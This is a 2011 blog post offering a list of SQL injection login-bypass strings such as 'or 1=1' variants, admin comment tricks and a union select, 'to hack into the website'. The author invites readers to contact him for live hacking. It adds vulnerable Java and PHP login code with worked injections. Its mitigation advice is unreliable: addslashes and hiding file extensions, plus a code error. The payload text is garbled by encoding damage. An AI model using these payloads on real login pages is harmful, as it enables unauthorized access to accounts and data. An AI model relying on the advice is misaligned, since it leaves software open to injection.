SQL injection strings for Hack Any Login Page

0 0 Sunday, 4 September 2011 Edit this post

Here I am posting some of the SQL injection strings that you can use to hack into the website. I have done some practical work out of this, ...




Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
If someone is pro of breaking into venerable systems and sites. please share your expriences/
� or 0=0 �
� or 0=0 ��
� or 0=0 #
� or 0=0 �
� or 0=0 ��
�� or 0=0 �
or 0=0 �
� or 0=0 #
� or 0=0 #
or 0=0 #
� or �x�='x
� or �x�=�x
�) or (�x�='x
� or 1=1�
or 1=1�
� or a=a��
� or a=a #
� or a=a�
� or �a�=�a
� or �a�='a
� or �a�=�a
�) or (�a�='a
�) or (�a�=�a
hi� or �a�=�a
hi� or 1=1 �
hi� or 1=1 �
hi� or �a�='a
hi�) or (�a�='a
hi�) or (�a�=�a
� or 1=1�
� or 1=1�
or 1=1�
� or �a�='a
� or �a�=�a
�) or (�a�='a
admin��
� or 1=1�
�� or 1=1�
� union select 1, �Eyeless�, �ez2do�, 1�
admin��
administrator��
superuser��
test��
This is the short list but these SQL injection strings are much powerful.
I have another hint :
Some of the SQL supporting system doesn�t support.
For example
� or �a�=�a
�) or (�a�='a
on some databases one would work, other wouldn�t.. first one would enclose the username (or pass) in quotes� first it would CLOSE the quotes (making it ��) and then says.. or �a�=�a.. the last quote would be closeing the final a.. and �a�=�a� is always true, so that would be how it works
however, the second uses (�Username�).. and changing it to say �(�) or (�a�='a�)�
Enjoy the HACK DAY :)

SQL Injection like this 

Login Java Code

String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");

query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";

PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();

if(users.next()){

//some thing here
}
else{

}
Injection Works like this
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";

Login PHP Code;
Username = ' OR 1=1;//
Password = ....
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];

$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";

$result=mysql_query($sql);
$count=mysql_num_rows($result);

if($count==1){

//some code
}
else {

}
Injection Works like this
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";

How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php

//Java Code
addSlashes(String userid);

// PHP Code
$myusername=addslashes($_POST['usr'];);
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp).

http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory.


By Kaila Piyush
My Google Profile HackingArticles4all.blogspot.com

Labels:

SHARE:

Twitter Facebook Google Pinterest

COMMENTS

BLOGGER
DISQUS
Name

Admin,10,Aircel,2,Airtel,2,Android,10,Android free Application,16,Android Tiricks,12,Angry Birds,2,Apache,1,backtrack5,2,Blogger Tips,4,BSNL,2,cmd,10,Computer Tricks,84,Download,57,Earn More,1,Facebook Symbol,6,Facebook Tricks,12,Games,4,Gaming Tricks,4,Google,6,Google Gravity,1,Google Tricks,14,Google+ Tricks,8,Hackers Special,8,Hacking,69,Hacking Special,8,huawei,3,Idea,2,Increase Backlink,1,internet trick,62,iOS Tricks,1,iPhone Tricks,2,Java Script Trick,2,keygen,6,mobile browser,4,mobile tricks,34,MySQL,1,Notepad Tricks,6,Password Cracking,8,Phishing,2,PHP,1,proxy trick,1,Reliance,1,Samsung,1,Security Tips,9,Server,1,SMTP,1,sql injection,5,Tata Docomo,2,Technology,8,ucweb,4,Unlock Idea Netsetter,5,Unlock iphone,1,Unlock Vodafone all modem,3,Unlock Vodafone ZTE K3770-z,1,Vodafone,2,Web Designing,1,Windows Tricks,22,Wireless Hacking,9,wireless Modem Unlock,6,WordPress Themes,2,Youtube,1,
ltr
item
SMART SUPPORT ME: SQL injection strings for Hack Any Login Page
SQL injection strings for Hack Any Login Page
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyg-vmJqx2t2hmah87SeXyQVV2DkdjQSLb18VXHrTL5rlGhDniFIE8QCeGHCSEfEDrPJzeQ72crrAGLyF4YgbUagqCsF_YR23iAe0t1lBZiNvJrC6ODngKtsRFkp-2BecyEcknhwvkEzlt/s320/sql+injection.png
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyg-vmJqx2t2hmah87SeXyQVV2DkdjQSLb18VXHrTL5rlGhDniFIE8QCeGHCSEfEDrPJzeQ72crrAGLyF4YgbUagqCsF_YR23iAe0t1lBZiNvJrC6ODngKtsRFkp-2BecyEcknhwvkEzlt/s72-c/sql+injection.png
SMART SUPPORT ME
https://smartsupportme.blogspot.com/2011/09/sql-injection-strings-for-hack-any.html
https://smartsupportme.blogspot.com/
http://smartsupportme.blogspot.com/
http://smartsupportme.blogspot.com/2011/09/sql-injection-strings-for-hack-any.html
true
76892010980255686
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy